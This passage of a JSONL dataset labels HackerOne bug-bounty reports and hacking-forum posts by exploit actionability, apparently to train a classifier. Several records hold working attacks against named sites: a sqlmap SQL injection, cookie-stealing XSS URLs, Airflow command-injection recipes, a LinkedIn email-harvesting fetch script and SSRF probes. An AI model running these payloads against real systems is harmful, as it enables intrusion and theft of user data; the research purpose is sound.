https://contiv.io/\n2. https://in.godaddy.com/domainsearch/find?checkAvail=1&domainToCheck=contiv.io\n\n## Impact\n\nAs an attacker, I can host malicious content on the website.\nI can also, host malicious sdk or softwares, which user will think is part of the deployment docs as its referred in kubernetes.io, this can lead to RCE for users who are referring to this doc.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6eee168f6b509ba718e3", "text": "[Privilege Escalation] OpenSSL engines can be used to bypass and/or disable the permission model\n\n**Summary:** Node.js 20 allows loading arbitrary OpenSSL engines even when the permission model is enabled, which can bypass and/or disable the permission model.\n\n**Description:** The permission model implementation permits loading arbitrary native code, e.g., through `crypto.setEngine()`, even when native addons are disallowed, which is the default configuration. Not only can this code bypass the permission system, it can also disable the permission system entirely, effectively allowing JavaScript code to escalate its own privileges.\n\n## Steps To Reproduce:\n\n 1. Enable the permission model.\n 2. Call, for example, `crypto.setEngine()` with a compatible OpenSSL engine.\n 3. Arbitrary code execution occurs, unaffected by the permission model.\n\n## Impact\n\nThe permission model is supposed to restrict the capabilities of running code. However, exploiting this vulnerability allows an attacker to easily bypass the permission model entirely. The OpenSSL engine can, for example, disable the permission model in the host process, and subsequently executed JavaScript code will be unaffected by the previously enabled permission model. This allows running JavaScript code to effectively elevate its own permissions.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1a229b3e6f49c89deceb", "text": "Hello every I am learning C#. because I want to bypass Anti-Viruses by C#.But I don’t know how to learn this knowledge about bypass Anti-Viruses by C#.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-08-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ec2d6aaa758268195cca", "text": "[SQL Injection] Time Based SQL Injection\n\nHello and greetings and respect to you, dear friends\nWe all know that the sql injection bug is very dangerous, so this bug should be eliminated as soon as possible.\nI've identified an SQL injection vulnerability of type Time Based on https://diplomaticrooms.state.gov this site use wordpress cms but its not plugin sql injection \nBelow, we see how we found this vulnerability \nIf you look carefully, we see that search in the website name Search results The gap has occurred there\nas you can see POST Method [POST https://diplomaticrooms.state.gov/?s=porcelain,%20gilt ]\nnow it's time to inject or generate POC with lovely tool sqlmap \nWe used a text file here by Name request.txt\nand this is our command in sqlmap you can use this command for your own confidence\n\npython3 sqlmap.py -r request --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbs\n===========================================================================================\nPOST https://diplomaticrooms.state.gov/?s=porcelain,%20gilt HTTP/1.1\nHost: diplomaticrooms.state.gov\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\nPragma: no-cache\nCache-Control: no-cache\nContent-Type: application/x-www-form-urlencoded\nReferer: https://diplomaticrooms.state.gov/?s=porcelain,%20gilt\nContent-Length: 133\nCookie: AWSALB=Bcs9ZrXwIhoRbHdfPbZAnVhkYJt9OJslAaUUgh5cOw9FMhg/43C2umhc4fQe7PtAorAHMSdr2dNw0asilWMYXjaFigXJhQJ2lxs05WQbpeI/cYRSGXLyo4E+hiQ1; AWSALBCORS=Bcs9ZrXwIhoRbHdfPbZAnVhkYJt9OJslAaUUgh5cOw9FMhg/43C2umhc4fQe7PtAorAHMSdr2dNw0asilWMYXjaFigXJhQJ2lxs05WQbpeI/cYRSGXLyo4E+hiQ1\nConnection: Close\nsearch=porcelain%2C+gilt%27+AND+%28SELECT+*+FROM+%28SELECT%28SLEEP%285%29%29%29Xeps%29+AND+%27HlBp%27%3D%27HlBp&post_types%5B%5D=post\n======================================================================================\n python3 sqlmap.py -r request --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbs\n ___\n __H__\n ___ ___[\"]_____ ___ ___ {1.7.1.5#dev}\n|_ -| . [\"] | .'| . |\n|___|_ [']_|_|_|__,| _|\n |_|V... |_| https://sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:21:06 /2023-02-17/\n\n[12:21:06] [INFO] parsing HTTP request from 'request'\n[12:21:06] [INFO] loading tamper module 'space2comment'\n[12:21:06] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5' from file '/home/ubuntu/sqlmap/data/txt/user-agents.txt'\ncustom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y\n[12:21:06] [INFO] resuming back-end DBMS 'mysql'\n[12:21:06] [INFO] testing connection to the target URL\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: #1* ((custom) POST)\n Type: boolean-based blind\n Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)\n Payload: search=porcelain, gilt' AND (SELECT -9789) OR 6323=6323# FROM (SELECT(SLEEP(5)))Xeps) AND 'HlBp'='HlBp&post_types[]=post\n---\n[12:21:07] [WARNING] changes made by tampering scripts are not included in shown payload content(s)\n[12:21:07] [INFO] the back-end DBMS is MySQL\nweb application technology: Apache, PHP 7.4.16\nback-end DBMS: MySQL 5 (MariaDB fork)\n[12:21:07] [INFO] fetching database names\n[12:21:07] [INFO] fetching number of databases\n[12:21:14] [WARNING] reflective value(s) found and filtering out\n[12:21:14] [INFO] resumed: 6\n[12:21:14] [INFO] retrieving the length of query output\n[12:21:14] [INFO] retrieved: 18\n[12:22:32] [INFO] retrieved: information_schema\n[12:22:32] [INFO] retrieving the length of query output\n[12:22:32] [INFO] retrieved: 5\n[12:23:01] [INFO] retrieved: mysql\n[12:23:01] [INFO] retrievin", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "82454db3b2a0cda1cb3f", "text": "[Improper Input Validation] Apache Airflow Google Cloud Sql Provider Remote Command Execution\n\n## 0x01 Test environment\nairflow 2.5.1\n[apache-airflow-providers-google](https://airflow.apache.org/docs/apache-airflow-providers-google/8.8.0/) 8.8.0\nBuild with docker compose\n## 0x02 Reproduction steps\n### 2.1 Prepare the malicious executable\nWrite the following `exec.cpp` file.\n```\n#include\nusing namespace std;\nint main(){\n system(\"mkdir /tmp/hello\");\n return 0;\n}\n```\nIn a linux environment, use g++ to compile and rename it to system\n```python\ng++ exec.cpp -o system\n```\n{F2213397}\nPut the compiled system malicious executable file into Google Cloud Storage, and set the permission to public. My address for this exploit is [https://storage.googleapis.com/swordlight/system](https://storage.googleapis.com/swordlight/system)\n\n### 2.2 Creating a Malicious Google Cloud SQL Database Connection\nCreate the following Google Cloud SQL Database connection named aaa under Admin->Connections Among them.\nHost, Schema, Login, and Port filed are required, just fill in the content that conforms to the format.\n{F2213400}\nAmong them, Extra filed fills in the actual content as follows, and note that sql_proxy_version is set to `../swordlight/system?a=`\n```python\n{\n \"project_id\":\"pivotal-gearing-375804\",\n \"instance\":\"hellopg\",\n \"location\":\"us-central1-b\",\n \"database_type\":\"postgres\",\n \"use_proxy\":\"True\",\n \"use_ssl\":\"False\",\n \"sql_proxy_use_tcp\":\"True\",\n \"sql_proxy_version\":\"../swordlight/system?a=\",\n \"sslcert\":\"\",\n \"sslkey\":\"\",\n \"sslrootcert\":\"\"\n}\n```\n### 2.3 Use the CloudSQLExecuteQueryOperator operator in Dag for verification\nCreate a google_test.py script that uses the CloudSQLExecuteQueryOperator operator. \nPut it in the `/opt/airflow/dags` directory so that it can be automatically loaded by airflow.The content is as follows, where gcp_cloudsql_conn_id is set to the connection name aaa we established above.\n```python\nfrom __future__ import annotations\n\nimport os\nimport subprocess\nfrom datetime import datetime\nfrom os.path import expanduser\nfrom urllib.parse import quote_plus\n\nfrom airflow import models\nfrom airflow.providers.google.cloud.operators.cloud_sql import CloudSQLExecuteQueryOperator\n\n\nSQL = [\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)\",\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)\", # shows warnings logged\n \"INSERT INTO TABLE_TEST VALUES (0)\",\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST2 (I INTEGER)\",\n \"DROP TABLE TABLE_TEST\",\n \"DROP TABLE TABLE_TEST2\",\n]\n\n\npostgres_kwargs = dict(\n user=\"postgres\",\n password=r\"ktd2(%EzQ5\",\n public_port=\"5432\",\n public_ip=\"34.122.52.6\",\n project_id=\"pivotal-gearing-375804\",\n location=\"us-central1-b\",\n instance=\"hellopg\",\n database=\"postgres\",\n client_cert_file=\"key/postgres-client-cert.pem\",\n client_key_file=\".key/postgres-client-key.pem\",\n server_ca_file=\".key/postgres-server-ca.pem\",\n)\n\n\n# Postgres: connect via proxy over TCP\nos.environ[\"AIRFLOW_CONN_PROXY_POSTGRES_TCP\"] = (\n \"gcpcloudsql://{user}:{password}@{public_ip}:{public_port}/{database}?\"\n \"database_type=postgres&\"\n \"project_id={project_id}&\"\n \"location={location}&\"\n \"instance={instance}&\"\n \"use_proxy=True&\"\n \"sql_proxy_use_tcp=True\".format(**postgres_kwargs)\n)\n\nconnection_names = [\n \"proxy_postgres_tcp\",\n]\n\nwith models.DAG(\n dag_id=\"example_gcp_sql_query\",\n start_date=datetime(2021, 1, 1),\n catchup=False,\n tags=[\"example\"],\n) as dag:\n prev_task = None\n\n\n task = CloudSQLExecuteQueryOperator(\n gcp_cloudsql_conn_id=\"aaa\",gcp_conn_id=\"proxy_postgres_tcp\",task_id=\"example_gcp_sql_task_proxy_postgres_tcp\" , sql=SQL\n )\n tasks.append(task)\n if prev_task:\n prev_task >> task\n prev_task = task\n\n# [END howto_operator_cloudsql_query_operators]\n```\n{F2213402}\nOpen the example_gcp_sql_query dag corresponding to our google_test.py script in the UI management interface, and run.\n{F2213403}\nClick to view the running graph and logs through the Graph menu.\n{F2213404}\n{F2213405}\nIt can be seen fr", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "aaae9ff87c09ba469c55", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS via ' profile ' at https://www.miroyalcanin.cl/\n\nhi team \ni found stored xss on profile \n\n1. Go to registration page (https://www.miroyalcanin.cl/)\n2. Verified your account.\n3. Go to login page and login your account.\n\nFor the fastly test, use this credentials to login (my test account)\n\n* For Attacker \n\nemail: deweha7916@mitigado.com\npass: Password\n* For Victime\n\nemail: povik23037@cyclesat.com\npass: password\n\nAfter login i change animal name to payload xss .. i open victime account and i put attacker profile url so i succeeded.\n\n{F2258722}\n\n## Impact\n\nStored Cross Site Scripting which attacker can execute malicious javascript payload.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "722df1502c432145c39b", "text": "cherryeater: I will happy to help you without spoilering if you still needed. Can you give any more hints?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b9e7742314e76539350a", "text": "[Unknown] [CPP]Add query to detect bugs like CVE-2017-5123\n\nThis bug was reported directly to GitHub Security Lab.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2017-5123"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b60ba0cb2e8ca8e68b94", "text": "[Information Disclosure] Hackers two email disclosed on submission at hackerone hactivity\n\n**Summary:**\nI was reading all hacker one's disclosed report , One this got my attention , where hackers/reporters email disclosed on video poc \n\n\n### Steps To Reproduce\n\n1. visit this report https://hackerone.com/reports/262661\n\n2. Scroll down until you see video poc \n{F2666724}\n\n3. Watch the video poc from 6.00-7.15 minutes \nas you can see hackers/reporters two emails has been disclosed \n███████\n████\n\n* Hacker one should check properly before disclosing any submission & must hide all the sensitive content from any submission .\n\n## Impact\n\ninformation disclosure", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e3f8e2c201dad8887ef8", "text": "[Code Injection] CVE-2022-40127: RCE in Apache Airflow <2.4.0 bash example\n\nairflow-2.3.3/airflow/example_dags/example_bash_operator.py has a command injection vulnerability.\nI can control the run_id in the following code(example_bash_operator.py),So I can inject custom commands.\n```\n also_run_this = BashOperator(\n task_id='also_run_this',\n bash_command='echo \"run_id={{ run_id }} | dag_run={{ dag_run }}\"',\n )\n```\nEnter the DAGs menu and start example_bash_operator task, select “Trigger DAG w/ config”.Set the run_id to \" `touch /tmp/success` \" and trigger.\n\n{F2036322}\n\n## Impact\n\nExecute any OS command", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-40127"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3c1d365acbc1e76a9466", "text": "[Cross-site Scripting (XSS) - Stored] XSS and HTML Injection on the pressable.com search box\n\n## Summary:\nHi, I have found that search box on pressable.com is vulnerable for XSS attack and HTML Injection .\n\n## Steps To Reproduce:\n\n1. Visit https://pressable.com/knowledgebase/\n2. Put the payload on the search box. \n\nXSS Payload: \">\n\nHTML Injection Payload:

Visit Our New WebSite

e x a m p l e . c o m

\n\n3.XSS will be triggered /HTML Injection will be reflected.\n\nLink with XSS Payload: [https://pressable.com/?s=%22%3E%3Cimg+src%3Dx+onerror%3Djavascript%3Aalert%28document.cookie%29%3E&post_type=knowledgebase](https://pressable.com/?s=%22%3E%3Cimg+src%3Dx+onerror%3Djavascript%3Aalert%28document.cookie%29%3E&post_type=knowledgebase)\n\nLink with HTML Injection Payload: [https://pressable.com/?s=%3Ch1%3E%3Cfont+Color%3Dred%3EVisit++Our++New++WebSite+%3C%2Fh1%3E%3Ch3%3E%3Cmark%3E%3Ca+href%3D%22https%3A%2F%2Fexample.com%22%3Ee+x+a+m+p+l+e+.+c+o+m+%3C%2Fa%3E%3C%2Fmark%3E%3C%2Fh3%3E&post_type=knowledgebase](https://pressable.com/?s=%3Ch1%3E%3Cfont+Color%3Dred%3EVisit++Our++New++WebSite+%3C%2Fh1%3E%3Ch3%3E%3Cmark%3E%3Ca+href%3D%22https%3A%2F%2Fexample.com%22%3Ee+x+a+m+p+l+e+.+c+o+m+%3C%2Fa%3E%3C%2Fmark%3E%3C%2Fh3%3E&post_type=knowledgebase)\n\n## Supporting Material/References:\nPOC Video Attached\n\n## Impact\n\nDue to these vulnerabilities, attacker can easily divert victims to their malicious site and able to get credentials of victims.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b9c32f6530c073f35028", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS in merge request pages\n\nHello Gitlab!\n\n[Vulnerable code](https://gitlab.com/gitlab-org/gitlab/blob/9d81e97d9d111f874799605ce50ae480ae15b0c5/app/assets/javascripts/vue_merge_request_widget/components/states/mr_widget_rebase.vue#L47)\n\nTo reproduce the bug, we need to open a merge request with the following conditions:\n1. Project must have 'Merge commit with semi-linear history' or 'Fast-forward merge' merge method\n2. The merge request must require rebase before fast-forward/merge\n3. A visitor of the merge request page must not have permissions to push to source branch\n4. Target branch name must have a special name `` :) \n\n**Steps to reproduce:**\n\n1. Run Gitlab `docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest`\n2. Create a new project\n3. Go to the project settings and set the 'Merge method' to 'Fast-forward merge' or 'Merge commit with semi-linear history' {F618529}\n4. Clone the repository and run the following in the repository:\n\n ```bash\n touch 1.txt\n git add 1.txt\n git commit -m \"initial commit\"\n git push origin master\n \n git checkout -b \"\"\n touch 2.txt\n git add 2.txt\n git commit -m \"add 2.txt\"\n git push origin \"\"\n \n git checkout master\n touch 3.txt\n git add 3.txt\n git commit -m \"add 3.txt\"\n git push origin master\n ```\n\n5. Create a merge request `master` => ``\n6. Then we have to visit the merge request page under a user who does not have permissions to push to the source branch (in our case, `master` branch). For example: \n * Make the project public and visit the merge request page under any user who does not have permissions in the project (or without authorization)\n * Invite a user to the project, but without permissions to push to the source branch.\n\n{F618526}\n{F618527}\n{F618528}\n\n```bash\nroot@gitlab:/# gitlab-rake gitlab:env:info\n\nSystem information\nSystem:\t\t\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.6.3p62\nGem Version:\t2.7.9\nBundler Version:1.17.3\nRake Version:\t12.3.3\nRedis Version:\t3.2.12\nGit Version:\t2.22.0\nSidekiq Version:5.2.7\nGo Version:\tunknown\n\nGitLab information\nVersion:\t12.4.0\nRevision:\t1425a56c75b\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t10.9\nURL:\t\thttp://gitlab.example.com\nHTTP Clone URL:\thttp://gitlab.example.com/some-group/some-project.git\nSSH Clone URL:\tgit@gitlab.example.com:some-group/some-project.git\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers: \n\nGitLab Shell\nVersion:\t10.2.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\nroot@gitlab:/# \n```\n\n## Impact\n\nAn attacker can:\n\n1. Perform any action within the application that a user can perform\n2. Steal sensitive user data\n3. Steal user's credentials", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c3b3f0c93f2a5e77cd5e", "text": "[Misconfiguration] Subdomain takeover on 'de-headless.staging.gymshark.com'\n\nThe Gymshark subdomain https://de-headless.staging.gymshark.com/ was pointing to an unclaimed Shopify site. Because of this an attacker could claim this subdomain, via Shopify, and serve their own content.\n\nThis is extremely dangerous as an attacker could serve any malicious content on this domain such as malware, domain defacement, phishing campaigns etc. \n\nAlso, phishing victims wouldn't be able to identify the maliciousness of a potential phishing campaign because it would be from a valid Gymshark subdomain.\n\n**Note:** *I have temporarily claimed this domain for PoC and have password protected the site to reduce unnecessary impact to others. I am happy to remove this protection if you require further takeover evidence*.\n\n## Remediation\n- Remove the CNAME record for Shopify on 'de-headless.staging.gymshark.com'.\n- I can release 'de-headless.staging.gymshark.com' for reclaim if needed.\n\n## PoC Link\nhttps://de-headless.staging.gymshark.com/\n\n## PoC Evidence\n{F1954064}\n{F1954066}\n{F1954069}\n{F1954070}\n\nThanks, A-p0c\n\n## Impact\n\nIf an attacker controlled https://de-headless.staging.gymshark.com/ they could host any malicious content they wanted, such as malware, defacement, a convincing phishing campaign", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "882ce4afa288ee9e0cf9", "text": "Thank you everybody, this topic helped a lot. Another hint, there are 3 fields with = that could be used on the injection. Make sure to test all of them.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-04-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "edfa8d7b5ade20980511", "text": "Thanks a lot @onthesauce ! Thought that I’ve already tried to do that yesterday. But with a fresh set of eyes today and your cp tips I’ve managed to get the flag. Happy hacking!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "489f9ce03734efa924e8", "text": "[Improper Authentication - Generic] Account Takeover via SMS Authentication Flow\n\n## Summary:\nDuring the **authentication** flow, an SMS is sent to the user in order to validate the session and proceed to the user account. The way Zenly API handles this flow is by:\n1. Calling the `/SessionCreate` endpoint with the mobile phone number of the user.\n2. A session for the user is created and a session token is returned, but no operations with this session are possible until the verification is complete.\n3. An SMS message is sent to the user, containing a verification code.\n4. Calling the `/SessionVerify` endpoint with both the session token and the verification code received by SMS.\n5. Once this request is successfully completed, the session token becomes valid and the user is now logged in.\nAfter the first call to `/SessionCreate`, subsequent calls will return ==the same session token==, until a call to `/SessionVerify` is made with a valid verification code. \n\n## Steps To Reproduce:\nTo reproduce this issue, an environment that enables intercepting and decoding network requests is required. Once this environment is set up, we are able to gain visibility over network activity.\nBy following a typical login flow, we can gain knowledge of the network requests that are involved. The flow starts by requesting the mobile phone number from the user. Once the user inputs their phone number, they will be prompted for a verification code that is sent through SMS.\n{F1355357}\nAt this moment, before entering the verification code, a request to `/SessionCreate` is launched. Note that this request (on the left) contains the mobile phone number of the user, and the response (on the right) to this request contains a **session token**, as shown below.\n███████\nNow, if an attacker also sends a request to `/SessionCreate` with the mobile phone number of the legitimate user, they will obtain the same session token. The response to this request, initiated by the attacker, is shown below:\n█████████\n**Note:** In this example, the attacker called `/SessionCreate` after the legitimate user. However, the attacker could also have called `/SessionCreate` before the legitimate user. This would have caused Zenly (on the side of the legitimate user) to obtain **the same session token that the attacker obtained**.\nAt this moment, the legitimate user will receive an SMS message containing a verification code. The authentication flow is finished (meaning the session token will become valid) once the user inputs this code in their Zenly application. However, once the user does this, the attacker will also end up with a valid session token in their hands (**since it is the same token**).\nThe attacker can then use this token to impersonate the legitimate user, executing any request to the Zenly API with it. The attacker can also, at any time, check if the session token is valid by launching a request to `/Me`, an endpoint that returns information about the current session. If the verification code has not yet been entered by the legitimate user, requests to `/Me` will return a 401 Unauthorized response. Once the code is entered, requests to `/Me` will return session information (such as phone number and user identifier), as shown below:\n████\nOnce the attacker knows the session is valid, they can launch requests to `███████`, `██████` or `████` instead, thus **gaining access to notifications, geolocation, and conversations** of the legitimate user and their friends. \n\n## Suggested Mitigation:\nIn order to mitigate this issue, the following steps could be taken:\n-\tSession tokens should be unique for each call to `/SessionCreate`.\n-\tA new SMS code should be sent on every call to `/SessionCreate`.\n-\tPrevious SMS codes should be invalidated once a new one is sent.\n-\tApply rate-limiting to both `/SessionCreate` and `/SessionVerify` endpoints.\n\n## Impact\n\nAn attacker can take over a user account by abusing the `/SessionCreate endpoint`, which will consistently return the same session token (although not yet valid) for the same user. Once the legitimate user validates the ", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c2befbb903297a89aa0b", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS in SVG file as data: url\n\nHi Shopify team, \n\nIn rich text editors (products, gifts, pages, etc) you allow *data:* URLs to be set as image sources, and I was able to store XSS in such image. While won't execute script that is stored inside the SVG it points to, if one opens the image, the script will be executed. What is important here is that you actually can use javascript here to access /admin area.\n\n#Steps to reproduce:\n1. Create a product with such html description:\n```html\n\"\"\n```\nInside this base 64 is code like this:\n\n```html\n\n\n\t\n", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2d425b09b1b0deeda0d3", "text": "I went ahead and followed you but Im unsure how to send an invite for the team… If you send a “join request” ill accept and then follow up with the team discord.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "001fd68edbc9d252f4f6", "text": "[Code Injection] Entire database of emails exposed through URN injection\n\nHello LinkedIn,\n\n1. Situation\n\n- The [decoration](https://learn.microsoft.com/en-us/linkedin/shared/api-guide/concepts/decoration?context=linkedin%2Fcontext) feature available to anyone on voyager API allows expanding URN fields.\n- The query engine does not check whether a field should be expandable or not. Every field can be expanded.\n- It is possible to trigger a URN resolution by assigning an URN value to a text field inside a profile and using a decoration expansion in a voyager query.\n- Assigning a text field to `urn:li:fs_emailAddress:[email_id]` and triggering a URN resolution allows an attacker to retrieve the email.\n- Email ids are generated sequentially or pseudo-sequentially, as a result the entire database of emails is exposed.\n\n2. Mitigation\n\nI suggest the following:\n- It should never be possible for a user to expand a field, unless said field is explicitly allowed to be expanded (good luck with that considering the model size lol)\n- There should be an access check on email data accessible through URN resolution\n\n3. Reproduce\n\n- Authenticate to linkedin.com\n- Edit your profile, go to contact info, add a website and set the following URL value `urn:li:fs_emailAddress:8519272224`\n- Open Chrome console and run the following code after editing the identity param and the csrf token:\n```js\nawait (await fetch(\"https://www.linkedin.com/voyager/api/identity/dash/profiles?decoration=%28websites*%28url~%29%29&memberIdentity=[public identifier]&q=memberIdentity\", {\n \"headers\": {\n \"accept\": \"application/vnd.linkedin.normalized+json+2.1\",\n \"accept-language\": \"en-US,en;q=0.9\",\n \"csrf-token\": \"ajax:[your token here]\",\n \"x-li-deco-include-micro-schema\": \"true\",\n \"x-li-lang\": \"en_US\",\n \"x-restli-protocol-version\": \"2.0.0\"\n },\n \"method\": \"GET\",\n \"mode\": \"cors\",\n \"credentials\": \"include\"\n})).json()\n```\n\nResult:\n```js\n{\n \"data\": {\n // ...\n },\n \"included\": [\n {\n \"entityUrn\": \"urn:li:fs_emailAddress:8519272224\",\n \"confirmed\": true,\n \"email\": \"melaa[redacted]@gmail.com\",\n \"$type\": \"com.linkedin.voyager.identity.normalizedprofile.EmailAddress\",\n \"primary\": null\n }\n ]\n}\n```\n\n## Impact\n\nWhat I'm showing here is a simple showcase attack.\nAn elaborated attack involving arrays and multiple accounts can probably retrieve millions of emails a day.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d6f9605ae3524415f9a5", "text": "[Unknown] [GO]: [CWE-090: LDAP Injection All For One]\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e6d9d84ba17189ed7465", "text": "[Server-Side Request Forgery (SSRF)] Blind SSRF on https://my.exnessaffiliates.com/ allows for internal network enumeration\n\n## Summary:\nHi\nHope you're well\nI have found a Blind SSRF vulnerability, in an endpoint on exnessaffiliates.com endpoint, which would allow for Internal network enumeration.\n\nThe endpoint in question is \n`https://my.exnessaffiliates.com/api/partner_integrations/template/probe`\n\nWhen an attacker makes a POST request, with the post data:\n```\n{\"data\":{\"url\":\"https://attacker-domain.tld\"}}\n```\n\nWe can see a DNS and HTTP request being made as so:\n```\nGET / HTTP/1.1\nHost: sa66ovrblrbiviochnojtli2bthk5ft4.oastify.com\nsentry-trace: xxx,baggage: sentry-trace_id=xxx,sentry-environment=production,sentry-public_key=xxx,sentry-transaction=/api/v1/partners/%7Bpartner_partner_uid%7D/integrations/\nUser-Agent: python-requests/2.28.1\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nuber-trace-id: xxx\n```\n\nThis is itself, would constitute a minor Blind SSRF vulnerability, if it is not intentionally accepted.\n\nHowever, if we use the post data:\n```\n{\"data\":{\"url\":\"https://127.0.0.1:80\"}}\n```\n\nNormally, if the port/host is not reachable, it will return a simple error:\n```\n\"code\":\"ValidationError\",\"message\":\"Invalid input.\",\"details\":[{\"field\":\"url\",\"message\":\"Invalid Postback URL\",\"code\":\"invalid\"}]\n```\n\nHowever, if the port is open, Python Requests is returning the error message to the user as so:\n{F2117769}\n\nThis indicates that the HTTP port 80 on 127.0.0.1 is open.\n\nWith permission, I will further this attack to inspect the internal network.\n\n\n## Steps to Reproduce:\n[Add details for how we can reproduce the issue. Please ensure reproducibility of the issue.]\n\n 1. Make a POST request to https://my.exnessaffiliates.com/api/partner_integrations/template/probe/\n with the post data \n {\"data\":{\"url\":\"https://127.0.0.1:80\"}}\n\n\n## Impact\nHow does the issue affect the business or the user? \nInternal network details are disclosed.\n\nWhat can the attacker get through the issue? \nInternal network device enumeration\nUtilise the requests for DDOS on a victim's server.\n\n\nCan the issue be escalated further? If so, how? \nPotentially, I will attempt further escalation with permission.\n\n## Mitigation\nDo not return Python errors to the user - even when URL contains blacklisted contents.\n\n\n## Supporting Material/References:\nattached above.\n\n## Impact\n\nCurrently, this will allow for network enumeration from the internal IP:\n███████\nWith permission, I will attempt to escalate this issue to inspect the internal network further, and attempt RCE.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "eaf253aaba6d0cb1fd1a", "text": "What do you folks think of reviving 